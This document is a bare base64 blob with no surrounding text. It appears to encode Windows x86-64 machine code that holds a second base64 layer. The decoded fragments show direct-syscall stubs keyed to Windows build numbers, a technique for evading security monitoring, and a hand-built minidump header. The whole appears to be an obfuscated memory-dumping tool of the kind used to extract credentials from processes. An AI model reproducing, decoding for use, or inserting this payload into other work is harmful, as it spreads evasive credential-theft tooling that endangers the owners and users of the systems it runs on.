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UVBQUxFZEQ0U1hBQUFBNmZRQUFBQm1nYmdnQVFBQUFDZ1BoSmdBQUFCbWdiZ2dBUUFBV2lrUGhKQUFBQUJtZ2JnZ0FRQUFPVGdQaElnQUFBQm1nYmdnQVFBQTF6b1BoSUFBQUFCbWdiZ2dBUUFBcXo5MGZHYUJ1Q0FCQUFEdVFuUjRab0c0SUFFQUFHTkZkSFJtZ2JnZ0FRQUF1a2QwY0dhQnVDQUJBQUM3UjNSc1pvRzRJQUVBQUdGS2RHaG1nYmdnQVFBQVlrcDBaT3RwdUQ0QUFBRHJZN2crQUFBQTYxeTRQd0FBQU90VnVFQUFBQURyVHJoQkFBQUE2MGU0UVFBQUFPdEF1RUVBQUFEck9iaEJBQUFBNnpLNFFRQUFBT3NydUVFQUFBRHJKTGhCQUFBQTZ4MjRRUUFBQU9zV3VFRUFBQURyRDdoQkFBQUE2d2k0UVFBQUFPc0J3MG1KeWc4RncyVklpd1FsWUFBQUFJTzRHQUVBQUFaMERvTzRHQUVBQUFwMFVPay9BUUFBZzdnY0FRQUFBWFFmZzdnY0FRQUFBZytFemdBQUFJTzRIQUVBQUFNUGhNZ0FBQURwRndFQUFHYUJ1Q0FCQUFDd0hRK0Vud0FBQUdhQnVDQUJBQUN4SFErRWx3QUFBT24wQUFBQVpvRzRJQUVBQUFBb0Q0U1lBQUFBWm9HNElBRUFBRm9wRDRTUUFBQUFab0c0SUFFQUFEazRENFNJQUFBQVpvRzRJQUVBQU5jNkQ0U0FBQUFBWm9HNElBRUFBS3MvZEh4bWdiZ2dBUUFBN2tKMGVHYUJ1Q0FCQUFCalJYUjBab0c0SUFFQUFMcEhkSEJtZ2JnZ0FRQUF1MGQwYkdhQnVDQUJBQUJoU25Sb1pvRzRJQUVBQUdKS2RHVHJhYmc1QUFBQTYyTzRPUUFBQU90Y3VEb0FBQURyVmJnN0FBQUE2MDY0UEFBQUFPdEh1RHdBQUFEclFMZzhBQUFBNnptNFBBQUFBT3N5dUR3QUFBRHJLN2c4QUFBQTZ5UzRQQUFBQU9zZHVEd0FBQURyRnJnOEFBQUE2dys0UEFBQUFPc0l1RHdBQUFEckFjTkppY29QQmNObFNJc0VKV0FBQUFDRHVCZ0JBQUFHZEE2RHVCZ0JBQUFLZEZEcFB3RUFBSU80SEFFQUFBRjBINE80SEFFQUFBSVBoTTRBQUFDRHVCd0JBQUFERDRUSUFBQUE2UmNCQUFCbWdiZ2dBUUFBc0IwUGhKOEFBQUJtZ2JnZ0FRQUFzUjBQaEpjQUFBRHA5QUFBQUdhQnVDQUJBQUFBS0ErRW1BQUFBR2FCdUNBQkFBQmFLUStFa0FBQUFHYUJ1Q0FCQUFBNU9BK0VpQUFBQUdhQnVDQUJBQURYT2crRWdBQUFBR2FCdUNBQkFBQ3JQM1I4Wm9HNElBRUFBTzVDZEhobWdiZ2dBUUFBWTBWMGRHYUJ1Q0FCQUFDNlIzUndab0c0SUFFQUFMdEhkR3htZ2JnZ0FRQUFZVXAwYUdhQnVDQUJBQUJpU25SazYybTRQd0FBQU90anVEOEFBQURyWExoQUFBQUE2MVc0UVFBQUFPdE91RUlBQUFEclI3aENBQUFBNjBDNFFnQUFBT3M1dUVJQUFBRHJNcmhDQUFBQTZ5dTRRZ0FBQU9za3VFSUFBQURySGJoQ0FBQUE2eGE0UWdBQUFPc1B1RUlBQUFEckNMaENBQUFBNndIRFNZbktEd1hEWlVpTEJDVmdBQUFBZzdnWUFRQUFCblFPZzdnWUFRQUFDblJRNlQ4QkFBQ0R1QndCQUFBQmRCK0R1QndCQUFBQ0Q0VE9BQUFBZzdnY0FRQUFBdytFeUFBQUFPa1hBUUFBWm9HNElBRUFBTEFkRDRTZkFBQUFab0c0SUFFQUFMRWRENFNYQUFBQTZmUUFBQUJtZ2JnZ0FRQUFBQ2dQaEpnQUFBQm1nYmdnQVFBQVdpa1BoSkFBQUFCbWdiZ2dBUUFBT1RnUGhJZ0FBQUJtZ2JnZ0FRQUExem9QaElBQUFBQm1nYmdnQVFBQXF6OTBmR2FCdUNBQkFBRHVRblI0Wm9HNElBRUFBR05GZEhSbWdiZ2dBUUFBdWtkMGNHYUJ1Q0FCQUFDN1IzUnNab0c0SUFFQUFHRktkR2htZ2JnZ0FRQUFZa3AwWk90cHVDTUFBQURyWTdnakFBQUE2MXk0SkFBQUFPdFZ1Q1VBQUFEclRyZ21BQUFBNjBlNEpnQUFBT3RBdUNZQUFBRHJPYmdtQUFBQTZ6SzRKZ0FBQU9zcnVDWUFBQURySkxnbUFBQUE2eDI0SmdBQUFPc1d1Q1lBQUFEckQ3Z21BQUFBNndpNEpnQUFBT3NCdzBtSnlnOEZ3MlZJaXdRbFlBQUFBSU80R0FFQUFBWjBEb080R0FFQUFBcDBVT2svQVFBQWc3Z2NBUUFBQVhRZmc3Z2NBUUFBQWcrRXpnQUFBSU80SEFFQUFBTVBoTWdBQUFEcEZ3RUFBR2FCdUNBQkFBQ3dIUStFbndBQUFHYUJ1Q0FCQUFDeEhRK0Vsd0FBQU9uMEFBQUFab0c0SUFFQUFBQW9ENFNZQUFBQVpvRzRJQUVBQUZvcEQ0U1FBQUFBWm9HNElBRUFBRGs0RDRTSUFBQUFab0c0SUFFQUFOYzZENFNBQUFBQVpvRzRJQUVBQUtzL2RIeG1nYmdnQVFBQTdrSjBlR2FCdUNBQkFBQmpSWFIwWm9HNElBRUFBTHBIZEhCbWdiZ2dBUUFBdTBkMGJHYUJ1Q0FCQUFCaFNuUm9ab0c0SUFFQUFHSktkR1RyYWJqNUFBQUE2Mk80K1FBQUFPdGN1QXNCQUFEclZiZ09BUUFBNjA2NEZBRUFBT3RIdUJjQkFBRHJRTGdaQVFBQTZ6bTRIUUVBQU9zeXVCOEJBQURySzdnaEFRQUE2eVM0SWdFQUFPc2R1Q01CQUFEckZyZ2pBUUFBNncrNEtBRUFBT3NJdUNnQkFBRHJBY05KaWNvUEJjTmxTSXNFSldBQUFBQ0R1QmdCQUFBR2RBNkR1QmdCQUFBS2RGRHBQd0VBQUlPNEhBRUFBQUYwSDRPNEhBRUFBQUlQaE00QUFBQ0R1QndCQUFBREQ0VElBQUFBNlJjQkFBQm1nYmdnQVFBQXNCMFBoSjhBQUFCbWdiZ2dBUUFBc1IwUGhKY0FBQURwOUFBQUFHYUJ1Q0FCQUFBQUtBK0VtQUFBQUdhQnVDQUJBQUJhS1ErRWtBQUFBR2FCdUNBQkFBQTVPQStFaUFBQUFHYUJ1Q0FCQUFEWE9nK0VnQUFBQUdhQnVDQUJBQUNyUDNSOFpvRzRJQUVBQU81Q2RIaG1nYmdnQVFBQVkwVjBkR2FCdUNBQkFBQzZSM1J3Wm9HNElBRUFBTHRIZEd4bWdiZ2dBUUFBWVVwMGFHYUJ1Q0FCQUFCaVNuUms2Mm00SGdBQUFPdGp1QjRBQUFEclhMZ2ZBQUFBNjFXNElBQUFBT3RPdUNFQUFBRHJSN2doQUFBQTYwQzRJUUFBQU9zNXVDRUFBQURyTXJnaEFBQUE2eXU0SVFBQUFPc2t1Q0VBQUFEckhiZ2hBQUFBNnhhNElRQUFBT3NQdUNFQUFBRHJDTGdoQUFBQTZ3SERTWW5LRHdYRFpVaUxCQ1ZnQUFBQWc3Z1lBUUFBQm5RT2c3Z1lBUUFBQ25SUTZUOEJBQUNEdUJ3QkFBQUJkQitEdUJ3QkFBQUNENFRPQUFBQWc3Z2NBUUFBQXcrRXlBQUFBT2tYQVFBQVpvRzRJQUVBQUxBZEQ0U2ZBQUFBWm9HNElBRUFBTEVkRDRTWEFBQUE2ZlFBQUFCbWdiZ2dBUUFBQUNnUGhKZ0FBQUJtZ2JnZ0FRQUFXaWtQaEpBQUFBQm1nYmdnQVFBQU9UZ1BoSWdBQUFCbWdiZ2dBUUFBMXpvUGhJQUFBQUJtZ2JnZ0FRQUFxejkwZkdhQnVDQUJBQUR1UW5SNFpvRzRJQUVBQUdORmRIUm1nYmdnQVFBQXVrZDBjR2FCdUNBQkFBQzdSM1JzWm9HNElBRUFBR0ZLZEdobWdiZ2dBUUFBWWtwMFpPdHB1QTBBQUFEclk3Z05BQUFBNjF5NERnQUFBT3RWdUE4QUFBRHJUcmdRQUFBQTYwZTRFQUFBQU90QXVCQUFBQURyT2JnUUFBQUE2eks0RUFBQUFPc3J1QkFBQUFEckpMZ1FBQUFBNngyNEVBQUFBT3NXdUJBQUFBRHJEN2dRQUFBQTZ3aTRFQUFBQU9zQncwbUp5ZzhGdzJWSWl3UWxZQUFBQUlPNEdBRUFBQVowRG9PNEdBRUFBQXAwVU9rL0FRQUFnN2djQVFBQUFYUWZnN2djQVFBQUFnK0V6Z0FBQUlPNEhBRUFBQU1QaE1nQUFBRHBGd0VBQUdhQnVDQUJBQUN3SFErRW53QUFBR2FCdUNBQkFBQ3hIUStFbHdBQUFPbjBBQUFBWm9HNElBRUFBQUFvRDRTWUFBQUFab0c0SUFFQUFGb3BENFNRQUFBQVpvRzRJQUVBQURrNEQ0U0lBQUFBWm9HNElBRUFBTmM2RDRTQUFBQUFab0c0SUFFQUFLcy9kSHhtZ2JnZ0FRQUE3a0owZUdhQnVDQUJBQUJqUlhSMFpvRzRJQUVBQUxwSGRIQm1nYmdnQVFBQXUwZDBiR2FCdUNBQkFBQmhTblJvWm9HNElBRUFBR0pLZEdUcmFiZ3pBQUFBNjJPNE13QUFBT3RjdURRQUFBRHJWYmcxQUFBQTYwNjROZ0FBQU90SHVEWUFBQURyUUxnMkFBQUE2em00TmdBQUFPc3l1RFlBQUFEcks3ZzJBQUFBNnlTNE5nQUFBT3NkdURZQUFBRHJGcmcyQUFBQTZ3KzROZ0FBQU9zSXVEWUFBQURyQWNOSmljb1BCY05sU0lzRUpXQUFBQUNEdUJnQkFBQUdkQTZEdUJnQkFBQUtkRkRwUHdFQUFJTzRIQUVBQUFGMEg0TzRIQUVBQUFJUGhNNEFBQUNEdUJ3QkFBQURENFRJQUFBQTZSY0JBQUJtZ2JnZ0FRQUFzQjBQaEo4QUFBQm1nYmdnQVFBQXNSMFBoSmNBQUFEcDlBQUFBR2FCdUNBQkFBQUFLQStFbUFBQUFHYUJ1Q0FCQUFCYUtRK0VrQUFBQUdhQnVDQUJBQUE1T0ErRWlBQUFBR2FCdUNBQkFBRFhPZytFZ0FBQUFHYUJ1Q0FCQUFDclAzUjhab0c0SUFFQUFPNUNkSGhtZ2JnZ0FRQUFZMFYwZEdhQnVDQUJBQUM2UjNSd1pvRzRJQUVBQUx0SGRHeG1nYmdnQVFBQVlVcDBhR2FCdUNBQkFBQmlTblJrNjJtNFBBQUFBT3RqdUR3QUFBRHJYTGc5QUFBQTYxVzRQZ0FBQU90T3VEOEFBQURyUjdnL0FBQUE2MEM0UHdBQUFPczV1RDhBQUFEck1yZy9BQUFBNnl1NFB3QUFBT3NrdUQ4QUFBRHJIYmcvQUFBQTZ4YTRQd0FBQU9zUHVEOEFBQURyQ0xnL0FBQUE2d0hEU1luS0R3WERaaTRQSDRRQUFBQUFBRUZYUVZaQlZVRlVWVmUvQUJBQUFGWk1pYzVUU0lIc0dBWUFBRW1MbVlBQUFBQk1pWVFrMkFFQUFJbVVKSmdCQUFCSWlZd2tvQUVBQUVqSGhDU1lBQUFBQUFBQUFNZUVKS0FBQUFBQUFBQUFTTWVFSkxBQkFBQUFBQUFBeDRRa3VBRUFBQUFBQUFCSXg0UWt3QUVBQUFBQUFBQkl4NFFreUFFQUFBQUFBQURIaENUUUFRQUFJZ2dBQUVqSGhDVG9BUUFBQUFBQUFFakhoQ1R3QVFBQUFBQUFBRWpIaENUNEFRQUFBQUFBQUVqSGhDUUFBZ0FBQUFBQUFNZUVKT0FCQUFBQUFBQUFRZitSaUFBQUFFRzRBQkFBQURIU1NJbkIvOU5JaWNOSWhjQjFOK25EQ2dBQVppNFBINFFBQUFBQUFFaUxycGdBQUFBQi8vK1dpQUFBQUVtSjJFR0orVEhTU0luQi85VklpY05JaGNBUGhKRUtBQUJGTWNsQmlmaElpZHE1QlFBQUFPai8rLy8vUFFRQUFNQjB2b1hBRDRWWUNnQUFpNHdrbUFFQUFFaUoyamxMVUErRlB3b0FBSXQ2QkVpTHJvQUFBQUNKdkNTNEFRQUEvNWFJQUFBQVRJMEVmekhTU0luQlNjSGdBdi9WU0ltRUpMQUJBQUJJaGNBUGhBNEtBQUJJaTc2UUFBQUFTSTJzSkJBQ0FBQk1qYXdrOEFBQUFQK1dpQUFBQUVtSjJESFNUSTJrSkxBQUFBQklpY0c3QVFBQUFQL1hTSTJNSkpBQkFBQklpZkpJamJ3a2hBQUFBT2dBRlFBQWk1UWs0QUVBQUVVeHlVVXh3RWk0VFVSTlVKT25BQUJJaTR3azJBRUFBTWVFSk9BQUFBQUFBQUFBU0ltRUpOQUFBQUJJdUFRQUFBQWdBQUFBU0ltRUpOZ0FBQUJJeDRRazZBQUFBQ0lJQUFEL2xxQUFBQUJJaVhRa0lFbUo2VWlMakNUWUFRQUFRYmdnQUFBQVNJMlVKTkFBQUFEb1p3c0FBSXVFSk9BQkFBQk1pZW5IaENTa0FBQUFCd0FBQUlQQVVJbUVKT0FCQUFDSmhDU3NBQUFBLzVhd0FBQUF1bXdBQUFCSXVHNTBaR3hzTG1Sc3VYSnpBQUJJaVlRa2pBQUFBRWk0VW5Sc1IyVjBUblJtaVpRa2xBQUFBRWk2Vm1WeWMybHZiazVJaVlRa3NBQUFBRWlOaENTTUFBQUFTSW1VSkxnQUFBQm1pWXdreEFBQUFFaUp3Y2VFSk1BQUFBQjFiV0pseG9Ra3hnQUFBQUJJaVVRa1VQK1dxQUFBQUV5SjRrbUp4a2lKd2YrVzBBQUFBRWlKK2tpSmZDUm9USTJFSklnQUFBQk1pVVFrTUVpTmpDU0FBQUFBLzlCTWlmRkZNZmFCcENTSUFBQUEvLzhBQVArV3VBQUFBQSszaENUd0FBQUF4b1FrSndFQUFBSEhoQ1EwQVFBQUFnQUFBR2FKaENRZ0FRQUFpNFFrSEFFQUFNZUVKRHdCQUFBUUFBQUFpWVFrSWdFQUFJdUVKQkFCQUFCSXg0UWtRQUVBQUFBQUFBQ0loQ1FtQVFBQWk0UWtnQUFBQUVqSGhDUklBUUFBQUFBQUFJbUVKQ2dCQUFDTGhDU0VBQUFBaVlRa0xBRUFBSXVFSklnQUFBQ0poQ1F3QVFBQWk0UWs0QUVBQUlQQU9JbUVKRGdCQUFCRWlmSC9sc0FBQUFDRndIUVJTSW5ZUklueFNOUGdTQW1FSkVBQkFBQkJnOFlCUVlQK1FIWFlpNVFrNEFFQUFFVXh5VVV4d0VpSjcwaUxqQ1RZQVFBQVNJMWNKSGovbHFBQUFBQklpWFFrSUVtSjZVaU5oQ1FnQVFBQVNJdU1KTmdCQUFCSWljSkJ1RGdBQUFCSWlVUWtRT2hxQ1FBQU1jQzVRQUFBQUlPRUpPQUJBQUE0ODBpclNJbnAvNWJJQUFBQVNJbDBKQ0JJalZRa2ZFaUxqQ1RZQVFBQUFjQkppZGxCdUFRQUFBQ0pSQ1I4NkNrSkFBQklpWFFrSUVtSjJVaUo2a1NMUkNSOFNJdU1KTmdCQUFEb0RBa0FBSXRFSkh4Rk1jbEZNY0FEaENUZ0FRQUFpNVFrM0FBQUFNZUVKS2dBQUFBNEFBQUFnOEFFU0l1TUpOZ0JBQUNKaENUZ0FRQUEvNWFnQUFBQVNJbDBKQ0JKaWVsSWpZUWtwQUFBQUVpTGpDVFlBUUFBU0luQ1FiZ01BQUFBU0lsRUpFam9wZ2dBQUl1RUpPQUJBQUNMakNUSUFRQUF4NFFrcEFBQUFBUUFBQUNKUkNSZ2lZUWtyQUFBQUlYSkQ0UlVDQUFBZytrQlNJdVVKTUFCQUFCSWFja29BZ0FBU0luUVRJMkVDaWdDQUFBeHlROGZBSU00QVlQUkFFZ0ZLQUlBQUV3NXdIWHZhOGxzUlRIMlRJbGtKRmhNamJ3a0ZBSUFBTWVFSklRQUFBQUFBQUFBUlluMGpVRUVpMHdrWUluSGlVUWtaSW5JQWZoSWpid2tPQUVBQUltRUpPQUJBQUNOUVFTSlJDUTg2dzBQSDBRQUFFaUxsQ1RBQVFBQVJJbmpTR25iS0FJQUFFaU5EQnFMQVlYQUQ0VWhBZ0FBU0lQQkhQK1d5QUFBQUVpTGxDVEFBUUFBVEluNWpVUUFBa2dCMm9tRUpCQUNBQUJJZzhJYy81WUFBUUFBaTVRazRBRUFBRVV4eVVVeHdFZ0RuQ1RBQVFBQVNJdU1KTmdCQUFCSWkwTUlTSW1FSkNBQkFBQ0xReENKaENRb0FRQUFpME1ZaVlRa0xBRUFBSXRERkl1Y0pCQUNBQUNKbENRMEFRQUFpWVFrTUFFQUFJMUQvb1BEQkltRUpCQUNBQUQvbHFBQUFBQkJpZGhOaWVsSWllcElpWFFrSUVpTGpDVFlBUUFBNkNnSEFBQUJuQ1RnQVFBQVRJbjVTSXRVSkRESGhDU3dBQUFBWEFBQUFFakhCd0FBQUFCSXgwY0lBQUFBQUVqSFJ4QUFBQUFBU01kSEdBQUFBQUJJeDBjZ0FBQUFBRWpIUnlnQUFBQUF4MGN3QUFBQUFQK1c2QUFBQUluRGhjQVBoSklBQUFCTWk3YUFBQUFBLzVhSUFBQUFRWW5ZTWRKSWljRkIvOVpKaWNaSWhjQjBjb3VVSklnQUFBQkppY0ZCaWRoTWlmbi9sdkFBQUFDRndIUkJUSXRNSkZCSWkxUWtXRTJKNkV5SjhmK1crQUFBQUlYQWRDZUR2Q1NNQUFBQU5FRzROQUFBQUVpTGxDVHdBQUFBU0luNVJBOUdoQ1NNQUFBQVJZbkEveFpJaTU2UUFBQUEvNWFJQUFBQVRZbndNZEpJaWNILzA0dUVKSVFBQUFDTFRDUThSVEhKUlRIQVNNZUVKR3dCQUFBQUFBQUFTTWVFSkhRQkFBQUFBQUFBalZBQmE4QnNpWlFraEFBQUFFakhoQ1I4QVFBQUFBQUFBRWpIaENTRUFRQUFBQUFBQUkwVUNFaUxqQ1RZQVFBQS81YWdBQUFBU0lsMEpDQklpMVFrUUUySjZVaUxqQ1RZQVFBQVFiaHNBQUFBNkxjRkFBQkJnOFFCUkR1a0pNZ0JBQUFQZ3EzOS8vOU1pMlFrV0l0VUpHQkZNY2xGTWNBeDIwaUxqQ1RZQVFBQS81YWdBQUFBU0lsMEpDQklpMVFrYUUySjZVaUxqQ1RZQVFBQVFiZ0VBQUFBNkdZRkFBQ0xSQ1JrUlRISlJUSEFTSXVNSk5nQkFBQ0poQ1NvQUFBQWk0UWszQUFBQUkxUURQK1dv